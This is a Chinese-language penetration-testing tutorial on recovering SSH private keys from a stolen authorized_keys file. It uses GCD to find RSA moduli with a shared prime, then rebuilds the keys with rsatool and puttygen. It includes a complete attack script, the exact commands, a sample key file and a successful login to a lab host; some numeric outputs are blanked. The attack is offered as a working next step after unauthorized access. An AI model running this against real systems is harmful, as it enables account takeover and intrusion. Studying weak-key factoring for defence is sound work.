在一个机器上获取大量PublicKey后的私钥恢复方法

渗透测试过程中，有时候会在某个未授权访问漏洞中获取authorized_keys文件，里面有大量账户用于免密登录的PublicKey，这个时候如何进行下一步渗透?

可以考虑rsa碰撞的方式，找到公用p因子的两个公钥，从而逐步恢复出私钥（具体原理不太明白，据说来自一篇论文：https://factorable.net/weakkeys12.extended.pdf），本文方法学习自：https://hackso.me/rsa-1-walkthrough/，手动重写了原文中的脚本，全部改为python执行，该脚本python2和python3兼容

*注：这里需要rsa的基础知识，最起码需要知道rsa加密算法的两个个因子：p、q 分别是什么

*注：这种方法成功率相对较低，目前计算机性能算力算法的综合作用下，找到公用p因子的可能性极低，所以想要成功需要有一个前提，authorized_keys文件中有大量公钥

一、获取authorized_keys文件，并执行以下脚本。----测试authorized_key文件和和attack.py脚本附在文末

该脚本可以算出哪两个公钥共用了一个p，并显示出其对应的q是什么

root@kali:~/Desktop/Pentration# python3 attack.py
[('', '', , , )]

可以看到第二和第四条公钥共用了一个p

二、计算两个公钥对应的RSA私钥

经过第一步，已经将SSH公钥转换为了RSA公钥，这里根据所得p和q可以计算出两个公钥对应的RSA私钥，需要用到rsatools

root@kali:~/Desktop/Pentration/rsatool# ./rsatool.py -o user2.pem -p  -q 

root@kali:~/Desktop/Pentration/rsatool# ./rsatool.py -o user4.pem -p  -q 

三、生成两个公钥对应的SSH私钥

经过第二步生成了两个公钥对应的RSA私钥，接下来就可以生成SSH私钥，用于免密登录

root@kali:~/Desktop/Pentration/rsatool# puttygen user2.pem -o user2 -O private-openssh-new
root@kali:~/Desktop/Pentration/rsatool# puttygen user4.pem -o user4 -O private-openssh-new

生成的user2和user4就是我们需要的SSH私钥

四、免密登录主机

root@kali:~/Desktop/Pentration/rsatool# ssh -i user2 user2@192.168.109.248
Last login: Sat Jan   ::  from 192.168.109.131
OpenBSD 6.3 (GENERIC) #: Sat Mar  :: MDT 

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug() utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

rsafun$ 

已经成功登录

*附件

1、attack.py

#attack.py
from itertools import combinations
from fractions import gcd
import subprocess
import os

file=open("authorized_keys")
pubKeylist=file.readlines()
tem1Name=1
for i in pubKeylist:
    tem1Name_t=str(tem1Name)
    file1_t=open("user"+tem1Name_t,'w')
    file1_t.write(i)
    file1_t.close()
    tem1Name+=1
file.close()
#print(tem1Name)

for i in range(1,tem1Name):
    cmd="ssh-keygen -e -m PEM -f user"+str(i)+" | "+"openssl rsa -RSAPublicKey_in -modulus -noout"
    rdata=subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.readlines()
    for j in rdata:
        j=bytes.decode(j).split('=')[1]
        tem2Name=str(i)
        file2_t=open("user"+tem2Name+".n",'w')
        file2_t.write(j)
        file2_t.close()

list = []
dict = {}
result = []

# build list
for i in range(9):
  list.append(str(i+1))

# build dictionary
for x in list:
  dict[x] = int(open("user"+x+".n", 'r').read(), 16)

# gcd
for (i, j) in combinations(list, 2):
  p = gcd(dict[i], dict[j])
  if (p != 1):
    result.append((i, j, p, int(dict[i]//p), int(dict[j]//p)))
    break

print(result)
os.system("rm user*")

2、authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4aOHSLLqN+odwP6G1GdxqJ+I/e1PuX3EbFe64snwy7IFAY8WrPBEsIqEWesOqUXzBI7G6YbiR13nen0XWqZtSn1yBbt1U1a8M+19phOVyo4Awx/wTvpG0EPYLI3H9J5aIOcBntXo6rrpiidMT2jYthUxwKKNUUHkbmLJ6QP9jNpCGZwm2CXO0GLmnFBYbE+53xKbX1DVD7aEiRxi62XhoUsepAsUJOzt4enAp3WuyMz9f8IlWg2BUiUFqlVImNRm9UuuoXhsBItLOcF0DHBgRZN4cFZyZO2x73SOJ5oJIikA3NhJ9rYwrE01HsKwYxhqXB94rM/SBTcJ5c6xes6Er user1@rsafun
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8i9Nk6Rpd6SlRG/FSPy/M8OXVEO/akLMVaNNJEpejOQ/ekdlTKyBMb4pIEwoKpu+PTTeAzigSNNTNg1TONyK0CsPJ3Uj1oJIrJXYNAFm7kxqQD2pKDIGB0hYj1pwivTLnNhh5cnS7Mnm9ijJPHQ8TEyade9a0v9Ps4BAFEIl9HfjkFm/KDTcQjuBjPTaYgazY5b/EHyfLf2deHeFT4AwzWBa7NdiFKKn5eXComWYIiBcUYWRf0ROd/Tx2aF3Q/hxmbS8ImR4l0ZRdsh6V+gmQzp2eAzNeN9QmJzF2gaDQGZBcKf0gpA8gj0prIcnLFctI6seS+an+N6yUW/bwNBM3 user2@rsafun
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCQ8ZjTDIcdjaAwSTS1u83FspC6iVba2a1W1jS+UVw+zrxc06xEeTBmdt4p0J9cWCK97pMrBR+dquuLikaSxfI6BxhZY+6MKTnghjI8MiktgpjEOJNA6rfOJzBoIvvQr4E3LJu0gRVDLoSoseDI1Vb9d5AwKQTjGSXGofIpsNzSrwLgu4JKvZAjIfvv/z0bk5VwBmjtJVntlMOBkPyD6ZuGoiWacUH8AFe2lT9h++G6IoIznPQCrIfeKUrIRwbWJWqTumy8RDCKVgTUUYszkq/r1/wAsR1HhZJVon/JczRsZ3ZZL84Zpja0EuYFZKjPgHsewN3pnUEHzWR4b9bCu8dz user3@rsafun
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7fmeWcwd24gYuSYBgQmO8mr394YsLYvVN46pGPvjEvpLwEXJ/K6JoLYpBX6EKEqj8mvx04YSy5IsZAjYbraRbhtpOmLXRBSOPwnhzUUcBHQANkKpq5pdJrEdD3xzG0CuHF80P0HY9tG/ZXY8J+LJ+LWyL4H0upWRGTcjGm7fZxyRVg2tI2gLPlN3zHpBji92nQ+CXyJPLOFhq8+/fls143tkJ3LissqgOPnLTQkdm6H9XbaWcgLao7ALXEgyXKWMZrMdEbpBiqOsTyBpwpIM3A7iAPu/1QqsPqnwKUbH7z6zn8TbfoPABN+MbvnEmj4jALqhDAnWAaMfq0yUWm5k5 user4@rsafun
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCge/tLWGuAwvfAZ6jZUVQ+JzhdSlanJduRV8urB94AlP82Rm5y1LMuAy70z0VTE2SNzMG2yqAFGtbfUvkoqfD5WnWG9oHJaoiaJnfxvOLKgNEztTTAdFdMDLHkD3hh4NdxH7aZxQIxHUWtKOhuZ8h73toH7tAkChPkaSO6G79hb2pciCP//TnJfc59Fd5fNQEdROQ8Ekp1mONrqCJAgKJn5BvzXeGAwpxbLpvyJFcW6uTj98GoE9qPSItt5/DPn9oVOX1RgTQjSDqZZq2m1rLtLIs9RIYu/xPTWQ2AsAHvrTCDoNo00ebQPDFz0MzTP8bIyw8ObpoWtdqkEUqi35/r user5@rsafun
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD00XwLgzJK9Ocwzid87PcnLf7DkZdoggvl624q0vSMKKDNpbj4DNdL8naR5XEoqx2t265AQcUyc2JOQKqMbPuyWdjX6GbYkAa7quWVh0B6W+7qoVLFWmJOi63Rzyrm/TRoHBjJI8jN6bBVoINnm7q0sjJw3xCYEACVR5CM+BLc9sNaVbRmsS1Nu434QeJ4GEiEcdf9LdjvUSZAClAeXcZ6W5hnGg2GCc9Rbo3eFfeXj7A8pk7VZKxhdACnOcYRcAIVUOoPHQUgE4BDTDPKDA5tM7Bf9aGfaIw2j9OnzpYUfen8DGK/LzktpBn10In2R05HXojO6pMrLvJ+81rGqy3x user6@rsafun
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDlKXFK6oJ4dJtesy2EwTjaq3HpXsvEYraPynrz4zFc1N8KnPiRdZBlX6opIQsxwseUUQXso+0VQ9v4nG3q0/bzKjmFJwg6j16M+P7KndYr1MM8U2tSQ+YOibPJ2FONF9VlPHF3mFviUI+fYGgb1p47Dxj/SQ5s1vuBk4Lf/FTJV3qAEvhwBYA7HysO83SBwSBA+DS64BAWXofZxpOKXET4Q+IKT3d7hIVaFJgWi9q1NRFeHZ0B3AtlrQ+QCppMiZU4aDwl5wGYuV+4QDlkTtQCwilaa2kc5ujbzJhCeww3pMSa0cr5G90a6lwf+GkX+NoumwsoqxgRgj9i1o2BxdKp user7@rsafun
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5bur6r9Kq2SB4YGmSFI14K6X8o4LAM6ZQLoMgp52W6NUz2TUFTAXdMkMVBS+dG2wSbcyuZ59Cc6vi2ehQViJmx1vzev2Ejj+bQIPagh6SU/oWRa/KiqlYdzjQsntS5IVQD4WX0kq7zOKDoNLqUhkgmZDBdISN/TRO+iEmKLKowoJlR5EDudLJqY+lZ6wwNtgwG4tMK5c/Czx41pIm1OKw09c23FD0/GGXv0JDBplku+Jjr1CNc+M7QkeVSDXwf8BzkNzWkkQnGxwJQF0ufVuuzkZ9C9Ub0MTvDzMcefiWz3oSkVWz5HeFe2ROS2rBFYUm5M48TrsD5bLYEn6i4LDh user8@rsafun
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUC0NKyGoR1EqOS1suQK0YfitFIt0lFkpwKVYVP4YD86aSiPqpWI6rRsLBevGxOfDdRFHqMmzx4S0tVJfYErs7O7X20xWy6oJJRX67h1QghDZOa8hWEFPSr2qlOhNTvfp9yJbTKvCzStSYN0AR81MiuLn6uSmr6N2LUU02mmA1JmuZlO/ilqU7/fECNY9Dl/hrX7oIqvbpxXZDfxa25PQqy9uTrZe71sCkBkdZ11qj+4hkWPUWrhZgosJXJb61h9QGbmhzte3YyJ6RoEzz3ozFamYBzuyszX/4Ne4juBXzXoD5+En+kFIMnfNk5bVYeD4XG6a8jDDcKzsFrvWZ7zgD user9@rsafun